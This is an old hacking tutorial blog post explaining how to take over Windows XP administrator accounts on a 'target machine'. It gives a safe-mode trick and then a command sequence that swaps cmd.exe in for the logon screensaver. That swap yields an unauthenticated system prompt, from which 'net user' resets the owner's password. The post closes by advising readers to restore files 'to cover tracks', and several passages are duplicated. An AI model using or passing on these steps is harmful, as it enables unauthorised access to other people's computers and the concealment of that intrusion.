How to change Windows XP Admin Passwords -The Easiest Way By Abhinav Singh.
(This Article is only For Knowledge purposes and we advise you not to misuse it, also we will not be responsible for any mishappening that happens to your computer due to this.)
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This method will only work if the person that owns the machine
is not smart enough.
This is how it works:
is not smart enough.
This is how it works:
When you or anyone installs Windows XP for the first time your
asked to put in your username and up to five others.
Now,
unknowns to a lot of other people this is the only place in
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
Windows XP that you can password the default Administrator Diagnostic
Account. This means that to by pass most administrators accounts
on Windows XP all you have to do is boot to safe mode by pressing F8
during boot up and choosing it. Log into the Administrator Account
and create your own or change the password on the current Account.
This only
works if the user on setup specified a password for the
Administrator Account.
Administrator Account.
This has worked for me on both Windows XP Home and Pro.
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Now this
one seems to be machine dependant, it works randomly(don't know why)
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
(this
appeared on www.astalavista.com a few days ago but i found that it wouldn't
work
on the welcome screen of a normal booted machine)
on the welcome screen of a normal booted machine)
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cd\ *drops
to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
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Now what
you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this
happens if you enter this command minus the quotes
"net
user <admin account name here> password"
If the
Administrator Account is called Frank and you want the password blah enter this
"net
user Frank blah"
and this changes
the password on franks machine to blah and your in.
Have fun
P.S: Dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Thanks For Reading This . All Credit Goes To
Tech - Theka Team.
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